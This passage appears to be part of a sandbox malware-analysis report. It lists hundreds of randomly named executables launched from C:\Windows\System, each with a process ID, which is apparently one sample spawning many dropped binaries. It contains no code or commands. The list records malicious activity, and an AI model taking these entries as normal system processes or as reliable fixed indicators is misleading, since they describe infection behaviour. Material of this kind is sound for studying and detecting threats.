  C:\Windows\System\hZAILDO.exe
  2⤵
  PID:7824
- C:\Windows\System\SvYyVho.exe
  C:\Windows\System\SvYyVho.exe
  2⤵
  PID:7844
- C:\Windows\System\rBvnPgS.exe
  C:\Windows\System\rBvnPgS.exe
  2⤵
  PID:7872
- C:\Windows\System\uNIRRsd.exe
  C:\Windows\System\uNIRRsd.exe
  2⤵
  PID:7900
- C:\Windows\System\ULuvGxY.exe
  C:\Windows\System\ULuvGxY.exe
  2⤵
  PID:7916
- C:\Windows\System\FfhUFnF.exe
  C:\Windows\System\FfhUFnF.exe
  2⤵
  PID:7992
- C:\Windows\System\PtjKpRm.exe
  C:\Windows\System\PtjKpRm.exe
  2⤵
  PID:8008
- C:\Windows\System\FnKveqy.exe
  C:\Windows\System\FnKveqy.exe
  2⤵
  PID:8028
- C:\Windows\System\cdKJBpT.exe
  C:\Windows\System\cdKJBpT.exe
  2⤵
  PID:8044
- C:\Windows\System\noFJDaX.exe
  C:\Windows\System\noFJDaX.exe
  2⤵
  PID:8060
- C:\Windows\System\WvnhGPC.exe
  C:\Windows\System\WvnhGPC.exe
  2⤵
  PID:8076
- C:\Windows\System\abzQjVQ.exe
  C:\Windows\System\abzQjVQ.exe
  2⤵
  PID:8092
- C:\Windows\System\GignUCu.exe
  C:\Windows\System\GignUCu.exe
  2⤵
  PID:8108
- C:\Windows\System\NXFOXWt.exe
  C:\Windows\System\NXFOXWt.exe
  2⤵
  PID:8128
- C:\Windows\System\LOQOXQr.exe
  C:\Windows\System\LOQOXQr.exe
  2⤵
  PID:8148
- C:\Windows\System\GHqPVOi.exe
  C:\Windows\System\GHqPVOi.exe
  2⤵
  PID:8164
- C:\Windows\System\qIEwQPR.exe
  C:\Windows\System\qIEwQPR.exe
  2⤵
  PID:8180
- C:\Windows\System\OHaehjW.exe
  C:\Windows\System\OHaehjW.exe
  2⤵
  PID:6564
- C:\Windows\System\xmejvuF.exe
  C:\Windows\System\xmejvuF.exe
  2⤵
  PID:7192
- C:\Windows\System\FTEHVOA.exe
  C:\Windows\System\FTEHVOA.exe
  2⤵
  PID:7232
- C:\Windows\System\IEEhNbj.exe
  C:\Windows\System\IEEhNbj.exe
  2⤵
  PID:7304
- C:\Windows\System\YamJVor.exe
  C:\Windows\System\YamJVor.exe
  2⤵
  PID:7320
- C:\Windows\System\yBwxPJA.exe
  C:\Windows\System\yBwxPJA.exe
  2⤵
  PID:7332
- C:\Windows\System\ONpuqRS.exe
  C:\Windows\System\ONpuqRS.exe
  2⤵
  PID:7356
- C:\Windows\System\QeGRoLt.exe
  C:\Windows\System\QeGRoLt.exe
  2⤵
  PID:7360
- C:\Windows\System\YGSSPjc.exe
  C:\Windows\System\YGSSPjc.exe
  2⤵
  PID:7392
- C:\Windows\System\FsjVpDj.exe
  C:\Windows\System\FsjVpDj.exe
  2⤵
  PID:7408
- C:\Windows\System\NKNffql.exe
  C:\Windows\System\NKNffql.exe
  2⤵
  PID:7448
- C:\Windows\System\YGueMll.exe
  C:\Windows\System\YGueMll.exe
  2⤵
  PID:7520
- C:\Windows\System\shZuvSK.exe
  C:\Windows\System\shZuvSK.exe
  2⤵
  PID:7548
- C:\Windows\System\wNXzsFn.exe
  C:\Windows\System\wNXzsFn.exe
  2⤵
  PID:7700
- C:\Windows\System\vZeMivp.exe
  C:\Windows\System\vZeMivp.exe
  2⤵
  PID:7628
- C:\Windows\System\KcUlDPn.exe
  C:\Windows\System\KcUlDPn.exe
  2⤵
  PID:7744
- C:\Windows\System\XfYycKm.exe
  C:\Windows\System\XfYycKm.exe
  2⤵
  PID:7704
- C:\Windows\System\aicqeVj.exe
  C:\Windows\System\aicqeVj.exe
  2⤵
  PID:7576
- C:\Windows\System\GmpQWXD.exe
  C:\Windows\System\GmpQWXD.exe
  2⤵
  PID:7644
- C:\Windows\System\bbYUAdb.exe
  C:\Windows\System\bbYUAdb.exe
  2⤵
  PID:7832
- C:\Windows\System\GsohXBQ.exe
  C:\Windows\System\GsohXBQ.exe
  2⤵
  PID:7724
- C:\Windows\System\befXYvZ.exe
  C:\Windows\System\befXYvZ.exe
  2⤵
  PID:7800
- C:\Windows\System\OTICzvt.exe
  C:\Windows\System\OTICzvt.exe
  2⤵
  PID:7880
- C:\Windows\System\eOaNvzm.exe
  C:\Windows\System\eOaNvzm.exe
  2⤵
  PID:7896
- C:\Windows\System\vqvqvfH.exe
  C:\Windows\System\vqvqvfH.exe
  2⤵
  PID:7944
- C:\Windows\System\IMynXAT.exe
  C:\Windows\System\IMynXAT.exe
  2⤵
  PID:7960
- C:\Windows\System\MFoFHug.exe
  C:\Windows\System\MFoFHug.exe
  2⤵
  PID:7908
- C:\Windows\System\peyDFIp.exe
  C:\Windows\System\peyDFIp.exe
  2⤵
  PID:7972
- C:\Windows\System\YzKFGYF.exe
  C:\Windows\System\YzKFGYF.exe
  2⤵
  PID:7988
- C:\Windows\System\uGkyWlz.exe
  C:\Windows\System\uGkyWlz.exe
  2⤵
  PID:8020
- C:\Windows\System\EdncBEg.exe
  C:\Windows\System\EdncBEg.exe
  2⤵
  PID:8084
- C:\Windows\System\LaxBnfH.exe
  C:\Windows\System\LaxBnfH.exe
  2⤵
  PID:8124
- C:\Windows\System\KEPEVqy.exe
  C:\Windows\System\KEPEVqy.exe
  2⤵
  PID:8004
- C:\Windows\System\eoHAUgF.exe
  C:\Windows\System\eoHAUgF.exe
  2⤵
  PID:8072
- C:\Windows\System\tbmsPWq.exe
  C:\Windows\System\tbmsPWq.exe
  2⤵
  PID:8140
- C:\Windows\System\vctTBdp.exe
  C:\Windows\System\vctTBdp.exe
  2⤵
  PID:8188
- C:\Windows\System\eEvJjoo.exe
  C:\Windows\System\eEvJjoo.exe
  2⤵
  PID:7216
- C:\Windows\System\BnmpgDl.exe
  C:\Windows\System\BnmpgDl.exe
  2⤵
  PID:7196
- C:\Windows\System\prsuLBe.exe
  C:\Windows\System\prsuLBe.exe
  2⤵
  PID:7156
- C:\Windows\System\KWreByh.exe
  C:\Windows\System\KWreByh.exe
  2⤵
  PID:7136
- C:\Windows\System\lWERyUE.exe
  C:\Windows\System\lWERyUE.exe
  2⤵
  PID:7264
- C:\Windows\System\MNMeRyK.exe
  C:\Windows\System\MNMeRyK.exe
  2⤵
  PID:7280
- C:\Windows\System\hHcBekP.exe
  C:\Windows\System\hHcBekP.exe
  2⤵
  PID:7284
- C:\Windows\System\waFKVNB.exe
  C:\Windows\System\waFKVNB.exe
  2⤵
  PID:7296
- C:\Windows\System\FNdLVEQ.exe
  C:\Windows\System\FNdLVEQ.exe
  2⤵
  PID:7388
- C:\Windows\System\Ayazknd.exe
  C:\Windows\System\Ayazknd.exe
  2⤵
  PID:7544
- C:\Windows\System\jNYQrMM.exe
  C:\Windows\System\jNYQrMM.exe
  2⤵
  PID:7816
- C:\Windows\System\DfhQwaO.exe
  C:\Windows\System\DfhQwaO.exe
  2⤵
  PID:7756
- C:\Windows\System\LzfaRJE.exe
  C:\Windows\System\LzfaRJE.exe
  2⤵
  PID:7868
- C:\Windows\System\qhhGsaA.exe
  C:\Windows\System\qhhGsaA.exe
  2⤵
  PID:7740
- C:\Windows\System\JdOuObC.exe
  C:\Windows\System\JdOuObC.exe
  2⤵
  PID:6768
- C:\Windows\System\pUCVpQm.exe
  C:\Windows\System\pUCVpQm.exe
  2⤵
  PID:7888
- C:\Windows\System\mfwZKMM.exe
  C:\Windows\System\mfwZKMM.exe
  2⤵
  PID:7676
- C:\Windows\System\THMmApN.exe
  C:\Windows\System\THMmApN.exe
  2⤵
  PID:7528
- C:\Windows\System\PkvWIkR.exe
  C:\Windows\System\PkvWIkR.exe
  2⤵
  PID:7980
- C:\Windows\System\TuWfdrn.exe
  C:\Windows\System\TuWfdrn.exe
  2⤵
  PID:7376
- C:\Windows\System\CMybCXI.exe
  C:\Windows\System\CMybCXI.exe
  2⤵
  PID:8136
- C:\Windows\System\KjRnjWw.exe
  C:\Windows\System\KjRnjWw.exe
  2⤵
  PID:6964
- C:\Windows\System\dlYzJcT.exe
  C:\Windows\System\dlYzJcT.exe
  2⤵
  PID:7344
- C:\Windows\System\Chwqcoo.exe
  C:\Windows\System\Chwqcoo.exe
  2⤵
  PID:7708
- C:\Windows\System\UKSMaku.exe
  C:\Windows\System\UKSMaku.exe
  2⤵
  PID:7180
- C:\Windows\System\bAPMuut.exe
  C:\Windows\System\bAPMuut.exe
  2⤵
  PID:7968
- C:\Windows\System\lfdmtcm.exe
  C:\Windows\System\lfdmtcm.exe
  2⤵
  PID:8040
- C:\Windows\System\nBmTlPS.exe
  C:\Windows\System\nBmTlPS.exe
  2⤵
  PID:7244
- C:\Windows\System\ymJuIhS.exe
  C:\Windows\System\ymJuIhS.exe
  2⤵
  PID:7336
- C:\Windows\System\HZEhlxc.exe
  C:\Windows\System\HZEhlxc.exe
  2⤵
  PID:7720
- C:\Windows\System\ukOWEBY.exe
  C:\Windows\System\ukOWEBY.exe
  2⤵
  PID:7292
- C:\Windows\System\ODQjyTV.exe
  C:\Windows\System\ODQjyTV.exe
  2⤵
  PID:7912
- C:\Windows\System\siemHzg.exe
  C:\Windows\System\siemHzg.exe
  2⤵
  PID:7792
- C:\Windows\System\KtDzbdh.exe
  C:\Windows\System\KtDzbdh.exe
  2⤵
  PID:8104
- C:\Windows\System\zPPRXOm.exe
  C:\Windows\System\zPPRXOm.exe
  2⤵
  PID:7952
- C:\Windows\System\hYKMPUc.exe
  C:\Windows\System\hYKMPUc.exe
  2⤵
  PID:7984
- C:\Windows\System\isEmrVj.exe
  C:\Windows\System\isEmrVj.exe
  2⤵
  PID:8056
- C:\Windows\System\hPWwGwD.exe
  C:\Windows\System\hPWwGwD.exe
  2⤵
  PID:8172
- C:\Windows\System\IwouzUf.exe
  C:\Windows\System\IwouzUf.exe
  2⤵
  PID:7564
- C:\Windows\System\dzkMKwP.exe
  C:\Windows\System\dzkMKwP.exe
  2⤵
  PID:8000
- C:\Windows\System\EtElyXy.exe
  C:\Windows\System\EtElyXy.exe
  2⤵
  PID:7272
- C:\Windows\System\iapgcgI.exe
  C:\Windows\System\iapgcgI.exe
  2⤵
  PID:7316
- C:\Windows\System\nEcSxGF.exe
  C:\Windows\System\nEcSxGF.exe
  2⤵
  PID:7856
- C:\Windows\System\QqUoKKH.exe
  C:\Windows\System\QqUoKKH.exe
  2⤵
  PID:7444
- C:\Windows\System\UVlEQVl.exe
  C:\Windows\System\UVlEQVl.exe
  2⤵
  PID:7532
- C:\Windows\System\MJNotXB.exe
  C:\Windows\System\MJNotXB.exe
  2⤵
  PID:7956
- C:\Windows\System\DHcKlcR.exe
  C:\Windows\System\DHcKlcR.exe
  2⤵
  PID:8200
- C:\Windows\System\egcWmVW.exe
  C:\Windows\System\egcWmVW.exe
  2⤵
  PID:8216
- C:\Windows\System\MoYlAkt.exe
  C:\Windows\System\MoYlAkt.exe
  2⤵
  PID:8232
- C:\Windows\System\mhWBLyn.exe
  C:\Windows\System\mhWBLyn.exe
  2⤵
  PID:8288
- C:\Windows\System\susfVpS.exe
  C:\Windows\System\susfVpS.exe
  2⤵
  PID:8304
- C:\Windows\System\SkHgnjc.exe
  C:\Windows\System\SkHgnjc.exe
  2⤵
  PID:8320
- C:\Windows\System\rbEVFGO.exe
  C:\Windows\System\rbEVFGO.exe
  2⤵
  PID:8336
- C:\Windows\System\fBMHTWb.exe
  C:\Windows\System\fBMHTWb.exe
  2⤵
  PID:8356
- C:\Windows\System\barbepa.exe
  C:\Windows\System\barbepa.exe
  2⤵
  PID:8380
- C:\Windows\System\MvcACSj.exe
  C:\Windows\System\MvcACSj.exe
  2⤵
  PID:8400
- C:\Windows\System\cBuiqip.exe
  C:\Windows\System\cBuiqip.exe
  2⤵
  PID:8488
- C:\Windows\System\YoblSXN.exe
  C:\Windows\System\YoblSXN.exe
  2⤵
  PID:8504
- C:\Windows\System\YhSoNnJ.exe
  C:\Windows\System\YhSoNnJ.exe
  2⤵
  PID:8520
- C:\Windows\System\wqGfFnU.exe
  C:\Windows\System\wqGfFnU.exe
  2⤵
  PID:8536
- C:\Windows\System\CyXGgbs.exe
  C:\Windows\System\CyXGgbs.exe
  2⤵
  PID:8560
- C:\Windows\System\wtPFOAJ.exe
  C:\Windows\System\wtPFOAJ.exe
  2⤵
  PID:8576
- C:\Windows\System\EqkEizN.exe
  C:\Windows\System\EqkEizN.exe
  2⤵
  PID:8600
- C:\Windows\System\jQwVEmk.exe
  C:\Windows\System\jQwVEmk.exe
  2⤵
  PID:8620
- C:\Windows\System\oopMIZL.exe
  C:\Windows\System\oopMIZL.exe
  2⤵
  PID:8656
- C:\Windows\System\YBvloul.exe
  C:\Windows\System\YBvloul.exe
  2⤵
  PID:8676
- C:\Windows\System\OWcAddY.exe
  C:\Windows\System\OWcAddY.exe
  2⤵
  PID:8692
- C:\Windows\System\ZBrzfif.exe
  C:\Windows\System\ZBrzfif.exe
  2⤵
  PID:8716
- C:\Windows\System\YUqhQms.exe
  C:\Windows\System\YUqhQms.exe
  2⤵
  PID:8900
- C:\Windows\System\HybCieY.exe
  C:\Windows\System\HybCieY.exe
  2⤵
  PID:8924
- C:\Windows\System\YxNofdN.exe
  C:\Windows\System\YxNofdN.exe
  2⤵
  PID:8940
- C:\Windows\System\oVUCPfp.exe
  C:\Windows\System\oVUCPfp.exe
  2⤵
  PID:8956
- C:\Windows\System\dLrUGZb.exe
  C:\Windows\System\dLrUGZb.exe
  2⤵
  PID:8972
- C:\Windows\System\TrEanDb.exe
  C:\Windows\System\TrEanDb.exe
  2⤵
  PID:8988
- C:\Windows\System\VcBDtVQ.exe
  C:\Windows\System\VcBDtVQ.exe
  2⤵
  PID:9008
- C:\Windows\System\JgAIUdy.exe
  C:\Windows\System\JgAIUdy.exe
  2⤵
  PID:9036
- C:\Windows\System\nfdOWKx.exe
  C:\Windows\System\nfdOWKx.exe
  2⤵
  PID:9052
- C:\Windows\System\pXEDxtq.exe
  C:\Windows\System\pXEDxtq.exe
  2⤵
  PID:9072
- C:\Windows\System\hvmFtHq.exe
  C:\Windows\System\hvmFtHq.exe
  2⤵
  PID:9088
- C:\Windows\System\JMecxou.exe
  C:\Windows\System\JMecxou.exe
  2⤵
  PID:9104
- C:\Windows\System\HFlSBZX.exe
  C:\Windows\System\HFlSBZX.exe
  2⤵
  PID:9120
- C:\Windows\System\BwdGria.exe
  C:\Windows\System\BwdGria.exe
  2⤵
  PID:9136
- C:\Windows\System\sONinxV.exe
  C:\Windows\System\sONinxV.exe
  2⤵
  PID:9188
- C:\Windows\System\WwIIZlW.exe
  C:\Windows\System\WwIIZlW.exe
  2⤵
  PID:8052
- C:\Windows\System\zxSOqnb.exe
  C:\Windows\System\zxSOqnb.exe
  2⤵
  PID:8212
- C:\Windows\System\eRYhTej.exe
  C:\Windows\System\eRYhTej.exe
  2⤵
  PID:8196
- C:\Windows\System\PNGhqCB.exe
  C:\Windows\System\PNGhqCB.exe
  2⤵
  PID:8296
- C:\Windows\System\AMwOJkB.exe
  C:\Windows\System\AMwOJkB.exe
  2⤵
  PID:8364
- C:\Windows\System\kUsMjin.exe
  C:\Windows\System\kUsMjin.exe
  2⤵
  PID:8396
- C:\Windows\System\OLJQkRc.exe
  C:\Windows\System\OLJQkRc.exe
  2⤵
  PID:8348
- C:\Windows\System\CPXijEU.exe
  C:\Windows\System\CPXijEU.exe
  2⤵
  PID:8408
- C:\Windows\System\wYpVsrv.exe
  C:\Windows\System\wYpVsrv.exe
  2⤵
  PID:8528
- C:\Windows\System\BSjDtRU.exe
  C:\Windows\System\BSjDtRU.exe
  2⤵
  PID:8612
- C:\Windows\System\xxwFFAf.exe
  C:\Windows\System\xxwFFAf.exe
  2⤵
  PID:8708
- C:\Windows\System\IEiLBMo.exe
  C:\Windows\System\IEiLBMo.exe
  2⤵
  PID:8652
- C:\Windows\System\IufBwlh.exe
  C:\Windows\System\IufBwlh.exe
  2⤵
  PID:8908
- C:\Windows\System\RTFznuR.exe
  C:\Windows\System\RTFznuR.exe
  2⤵
  PID:8748
- C:\Windows\System\hEiSzrJ.exe
  C:\Windows\System\hEiSzrJ.exe
  2⤵
  PID:8764
- C:\Windows\System\aVkitdf.exe
  C:\Windows\System\aVkitdf.exe
  2⤵
  PID:8780
- C:\Windows\System\akLLtyE.exe
  C:\Windows\System\akLLtyE.exe
  2⤵
  PID:8828
- C:\Windows\System\jthjnwc.exe
  C:\Windows\System\jthjnwc.exe
  2⤵
  PID:8980
- C:\Windows\System\SFfCfiw.exe
  C:\Windows\System\SFfCfiw.exe
  2⤵
  PID:9048
- C:\Windows\System\UJQVlpc.exe
  C:\Windows\System\UJQVlpc.exe
  2⤵
  PID:9064
- C:\Windows\System\QMSCsZJ.exe
  C:\Windows\System\QMSCsZJ.exe
  2⤵
  PID:9068
- C:\Windows\System\VzdmhUR.exe
  C:\Windows\System\VzdmhUR.exe
  2⤵
  PID:9160
- C:\Windows\System\DEbnJVy.exe
  C:\Windows\System\DEbnJVy.exe
  2⤵
  PID:9044
- C:\Windows\System\Lyxypoi.exe
  C:\Windows\System\Lyxypoi.exe
  2⤵
  PID:9144
- C:\Windows\System\SeuDvWL.exe
  C:\Windows\System\SeuDvWL.exe
  2⤵
  PID:8372
- C:\Windows\System\snJXhKd.exe
  C:\Windows\System\snJXhKd.exe
  2⤵
  PID:8608
- C:\Windows\System\EqHJXyP.exe
  C:\Windows\System\EqHJXyP.exe
  2⤵
  PID:8744
- C:\Windows\System\BKlwoKP.exe
  C:\Windows\System\BKlwoKP.exe
  2⤵
  PID:8432
- C:\Windows\System\PcEqsuH.exe
  C:\Windows\System\PcEqsuH.exe
  2⤵
  PID:8896
- C:\Windows\System\gnPPfHV.exe
  C:\Windows\System\gnPPfHV.exe
  2⤵
  PID:8456
- C:\Windows\System\TFNpbKD.exe
  C:\Windows\System\TFNpbKD.exe
  2⤵
  PID:8476
- C:\Windows\System\UqDCYpC.exe
  C:\Windows\System\UqDCYpC.exe
  2⤵
  PID:8544
- C:\Windows\System\oLeqOLJ.exe
  C:\Windows\System\oLeqOLJ.exe
  2⤵
  PID:8512
- C:\Windows\System\yvYdHHG.exe
  C:\Windows\System\yvYdHHG.exe
  2⤵
  PID:8596
- C:\Windows\System\BQYCfUz.exe
  C:\Windows\System\BQYCfUz.exe
  2⤵
  PID:8316
- C:\Windows\System\qhIpAAk.exe
  C:\Windows\System\qhIpAAk.exe
  2⤵
  PID:9200
- C:\Windows\System\ScGfnFK.exe
  C:\Windows\System\ScGfnFK.exe
  2⤵
  PID:8244
- C:\Windows\System\smEiYwe.exe
  C:\Windows\System\smEiYwe.exe
  2⤵
  PID:8756
- C:\Windows\System\tzORncp.exe
  C:\Windows\System\tzORncp.exe
  2⤵
  PID:8632
- C:\Windows\System\rJxlQcM.exe
  C:\Windows\System\rJxlQcM.exe
  2⤵
  PID:8644
- C:\Windows\System\ChkdKUx.exe
  C:\Windows\System\ChkdKUx.exe
  2⤵
  PID:8936
- C:\Windows\System\UQARdnt.exe
  C:\Windows\System\UQARdnt.exe
  2⤵
  PID:6588
- C:\Windows\System\WlalwHY.exe
  C:\Windows\System\WlalwHY.exe
  2⤵
  PID:8984
- C:\Windows\System\IeBvnJm.exe
  C:\Windows\System\IeBvnJm.exe
  2⤵
  PID:9032
- C:\Windows\System\RvHoMNd.exe
  C:\Windows\System\RvHoMNd.exe
  2⤵
  PID:8792
- C:\Windows\System\kqsnACi.exe
  C:\Windows\System\kqsnACi.exe
  2⤵
  PID:8888
- C:\Windows\System\SKAHFvL.exe
  C:\Windows\System\SKAHFvL.exe
  2⤵
  PID:9132
- C:\Windows\System\MyrTPHA.exe
  C:\Windows\System\MyrTPHA.exe
  2⤵
  PID:8724
- C:\Windows\System\QuaXIKc.exe
  C:\Windows\System\QuaXIKc.exe
  2⤵
  PID:8816
- C:\Windows\System\nZfKzui.exe
  C:\Windows\System\nZfKzui.exe
  2⤵
  PID:8848
- C:\Windows\System\SxBOydi.exe
  C:\Windows\System\SxBOydi.exe
  2⤵
  PID:8876
- C:\Windows\System\MEtyfja.exe
  C:\Windows\System\MEtyfja.exe
  2⤵
  PID:8424
- C:\Windows\System\jpsDJbT.exe
  C:\Windows\System\jpsDJbT.exe
  2⤵
  PID:9116
- C:\Windows\System\LILNOmv.exe
  C:\Windows\System\LILNOmv.exe
  2⤵
  PID:8388
- C:\Windows\System\ZsBRyty.exe
  C:\Windows\System\ZsBRyty.exe
  2⤵
  PID:8872
- C:\Windows\System\tfbbrky.exe
  C:\Windows\System\tfbbrky.exe
  2⤵
  PID:8480
- C:\Windows\System\QzNyLcC.exe
  C:\Windows\System\QzNyLcC.exe
  2⤵
  PID:8496
- C:\Windows\System\yTcwXKY.exe
  C:\Windows\System\yTcwXKY.exe
  2⤵
  PID:8472
- C:\Windows\System\hnpkAjY.exe
  C:\Windows\System\hnpkAjY.exe
  2⤵
  PID:8344
- C:\Windows\System\BXoUyKd.exe
  C:\Windows\System\BXoUyKd.exe
  2⤵
  PID:8636
- C:\Windows\System\fFWRxHg.exe
  C:\Windows\System\fFWRxHg.exe
  2⤵
  PID:9020
- C:\Windows\System\ckQCEnl.exe
  C:\Windows\System\ckQCEnl.exe
  2⤵
  PID:8860
- C:\Windows\System\JiuInmt.exe
  C:\Windows\System\JiuInmt.exe
  2⤵
  PID:8892
- C:\Windows\System\sEWbqQn.exe
  C:\Windows\System\sEWbqQn.exe
  2⤵
  PID:9176
- C:\Windows\System\ZREYSbh.exe
  C:\Windows\System\ZREYSbh.exe
  2⤵
  PID:8500
- C:\Windows\System\jOOfnds.exe
  C:\Windows\System\jOOfnds.exe
  2⤵
  PID:9208
- C:\Windows\System\TtRSSOp.exe
  C:\Windows\System\TtRSSOp.exe
  2⤵
  PID:8552
- C:\Windows\System\vDKmRhH.exe
  C:\Windows\System\vDKmRhH.exe
  2⤵
  PID:9184
- C:\Windows\System\WfzLPLr.exe
  C:\Windows\System\WfzLPLr.exe
  2⤵
  PID:8952
- C:\Windows\System\IzVQucf.exe
  C:\Windows\System\IzVQucf.exe
  2⤵
  PID:8284
- C:\Windows\System\MRsgPXg.exe
  C:\Windows\System\MRsgPXg.exe
  2⤵
  PID:9168
- C:\Windows\System\qfyMZao.exe
  C:\Windows\System\qfyMZao.exe
  2⤵
  PID:9112
- C:\Windows\System\ySimnQH.exe
  C:\Windows\System\ySimnQH.exe
  2⤵
  PID:8844
- C:\Windows\System\HCVllTv.exe
  C:\Windows\System\HCVllTv.exe
  2⤵
  PID:8808
- C:\Windows\System\EEhdvcC.exe
  C:\Windows\System\EEhdvcC.exe
  2⤵
  PID:8572
- C:\Windows\System\uGHISYE.exe
  C:\Windows\System\uGHISYE.exe
  2⤵
  PID:9148
- C:\Windows\System\QOZpqpS.exe
  C:\Windows\System\QOZpqpS.exe
  2⤵
  PID:8840
- C:\Windows\System\Titbaxa.exe
  C:\Windows\System\Titbaxa.exe
  2⤵
  PID:8444
- C:\Windows\System\CMpeMYK.exe
  C:\Windows\System\CMpeMYK.exe
  2⤵
  PID:9156
- C:\Windows\System\sulHPXp.exe
  C:\Windows\System\sulHPXp.exe
  2⤵
  PID:8588
- C:\Windows\System\kCPkxtX.exe
  C:\Windows\System\kCPkxtX.exe
  2⤵
  PID:8812
- C:\Windows\System\zXKZERy.exe
  C:\Windows\System\zXKZERy.exe
  2⤵
  PID:8836
- C:\Windows\System\XhZyuMY.exe
  C:\Windows\System\XhZyuMY.exe
  2⤵
  PID:8728
- C:\Windows\System\JAfDmfN.exe
  C:\Windows\System\JAfDmfN.exe
  2⤵
  PID:8796
- C:\Windows\System\mmfuncJ.exe
  C:\Windows\System\mmfuncJ.exe
  2⤵
  PID:8788
- C:\Windows\System\uXEuOlI.exe
  C:\Windows\System\uXEuOlI.exe
  2⤵
  PID:9228
- C:\Windows\System\adEvicq.exe
  C:\Windows\System\adEvicq.exe
  2⤵
  PID:9244
- C:\Windows\System\UeeHBoB.exe
  C:\Windows\System\UeeHBoB.exe
  2⤵
  PID:9260
- C:\Windows\System\KgFRzZi.exe
  C:\Windows\System\KgFRzZi.exe
  2⤵
  PID:9276
- C:\Windows\System\OxhDrpO.exe
  C:\Windows\System\OxhDrpO.exe
  2⤵
  PID:9292
- C:\Windows\System\oSXlfYN.exe
  C:\Windows\System\oSXlfYN.exe
  2⤵
  PID:9308
- C:\Windows\System\knYgZkJ.exe
  C:\Windows\System\knYgZkJ.exe
  2⤵
  PID:9324
- C:\Windows\System\eNEPyiK.exe
  C:\Windows\System\eNEPyiK.exe
  2⤵
  PID:9340
- C:\Windows\System\ggSlxDW.exe
  C:\Windows\System\ggSlxDW.exe
  2⤵
  PID:9356
- C:\Windows\System\rsfpbtQ.exe
  C:\Windows\System\rsfpbtQ.exe
  2⤵
  PID:9372
- C:\Windows\System\DqamwHH.exe
  C:\Windows\System\DqamwHH.exe
  2⤵
  PID:9392
- C:\Windows\System\WBbEHzK.exe
  C:\Windows\System\WBbEHzK.exe
  2⤵
  PID:9408
- C:\Windows\System\DQIeuaH.exe
  C:\Windows\System\DQIeuaH.exe
  2⤵
  PID:9424
- C:\Windows\System\phmpIJz.exe
  C:\Windows\System\phmpIJz.exe
  2⤵
  PID:9440
- C:\Windows\System\KLzJdTq.exe
  C:\Windows\System\KLzJdTq.exe
  2⤵
  PID:9456
- C:\Windows\System\zhvzBnP.exe
  C:\Windows\System\zhvzBnP.exe
  2⤵
  PID:9472
- C:\Windows\System\ocHdRuG.exe
  C:\Windows\System\ocHdRuG.exe
  2⤵
  PID:9488
- C:\Windows\System\cJIiROG.exe
  C:\Windows\System\cJIiROG.exe
  2⤵
  PID:9504
- C:\Windows\System\tVjDBXU.exe
  C:\Windows\System\tVjDBXU.exe
  2⤵
  PID:9520
- C:\Windows\System\MNjBawh.exe
  C:\Windows\System\MNjBawh.exe
  2⤵
  PID:9536
- C:\Windows\System\lKQCuUz.exe
  C:\Windows\System\lKQCuUz.exe
  2⤵
  PID:9552
- C:\Windows\System\WjywcLG.exe
  C:\Windows\System\WjywcLG.exe
  2⤵
  PID:9568
- C:\Windows\System\hBTmyqA.exe
  C:\Windows\System\hBTmyqA.exe
  2⤵
  PID:9584
- C:\Windows\System\PrNUZqT.exe
  C:\Windows\System\PrNUZqT.exe
  2⤵
  PID:9600
- C:\Windows\System\UHFMiws.exe
  C:\Windows\System\UHFMiws.exe
  2⤵
  PID:9616
- C:\Windows\System\LMUJGeD.exe
  C:\Windows\System\LMUJGeD.exe
  2⤵
  PID:9632
- C:\Windows\System\iqCDJIe.exe
  C:\Windows\System\iqCDJIe.exe
  2⤵
  PID:9648
- C:\Windows\System\YZWaMiF.exe
  C:\Windows\System\YZWaMiF.exe
  2⤵
  PID:9664
- C:\Windows\System\cDkJmNh.exe
  C:\Windows\System\cDkJmNh.exe
  2⤵
  PID:9680
- C:\Windows\System\RxwAUds.exe
  C:\Windows\System\RxwAUds.exe
  2⤵
  PID:9696
- C:\Windows\System\JGuzlFa.exe
  C:\Windows\System\JGuzlFa.exe
  2⤵
  PID:9712
- C:\Windows\System\UATphdu.exe
  C:\Windows\System\UATphdu.exe
  2⤵
  PID:9732
- C:\Windows\System\oPMVVXa.exe
  C:\Windows\System\oPMVVXa.exe
  2⤵
  PID:9756
- C:\Windows\System\eqmmKaP.exe
  C:\Windows\System\eqmmKaP.exe
  2⤵
  PID:9772
- C:\Windows\System\EeUYJpK.exe
  C:\Windows\System\EeUYJpK.exe
  2⤵
  PID:9788
- C:\Windows\System\bEbLgMB.exe
  C:\Windows\System\bEbLgMB.exe
  2⤵
  PID:9804
- C:\Windows\System\wneqxQs.exe
  C:\Windows\System\wneqxQs.exe
  2⤵
  PID:9824
- C:\Windows\System\NxQcdKO.exe
  C:\Windows\System\NxQcdKO.exe
  2⤵
  PID:9840
- C:\Windows\System\ueMeriN.exe
  C:\Windows\System\ueMeriN.exe
  2⤵
  PID:9856
- C:\Windows\System\sVJiKHg.exe
  C:\Windows\System\sVJiKHg.exe
  2⤵
  PID:9872
- C:\Windows\System\SydqpIX.exe
  C:\Windows\System\SydqpIX.exe
  2⤵
  PID:9888
- C:\Windows\System\QQajMTh.exe
  C:\Windows\System\QQajMTh.exe
  2⤵
  PID:9904
- C:\Windows\System\upXdiBX.exe
  C:\Windows\System\upXdiBX.exe
  2⤵
  PID:9920
- C:\Windows\System\JfWrbFU.exe
  C:\Windows\System\JfWrbFU.exe
  2⤵
  PID:9940
- C:\Windows\System\NXudhlX.exe
  C:\Windows\System\NXudhlX.exe
  2⤵
  PID:9960
- C:\Windows\System\NULebWq.exe
  C:\Windows\System\NULebWq.exe
  2⤵
  PID:9976
- C:\Windows\System\fgfCzIN.exe
  C:\Windows\System\fgfCzIN.exe
  2⤵
  PID:9992
- C:\Windows\System\mDaKRca.exe
  C:\Windows\System\mDaKRca.exe
  2⤵
  PID:10008
- C:\Windows\System\FZjnUaz.exe
  C:\Windows\System\FZjnUaz.exe
  2⤵
  PID:10024
- C:\Windows\System\kUuCHmy.exe
  C:\Windows\System\kUuCHmy.exe
  2⤵
  PID:10052
- C:\Windows\System\NvwyAnp.exe
  C:\Windows\System\NvwyAnp.exe
  2⤵
  PID:10068
- C:\Windows\System\xCwSQkv.exe
  C:\Windows\System\xCwSQkv.exe
  2⤵
  PID:10084
- C:\Windows\System\TffczoI.exe
  C:\Windows\System\TffczoI.exe
  2⤵
  PID:10100
- C:\Windows\System\HZAEEMo.exe
  C:\Windows\System\HZAEEMo.exe
  2⤵
  PID:10116
- C:\Windows\System\VZuslQD.exe
  C:\Windows\System\VZuslQD.exe
  2⤵
  PID:10132
- C:\Windows\System\iGXSdrt.exe
  C:\Windows\System\iGXSdrt.exe
  2⤵
  PID:10148
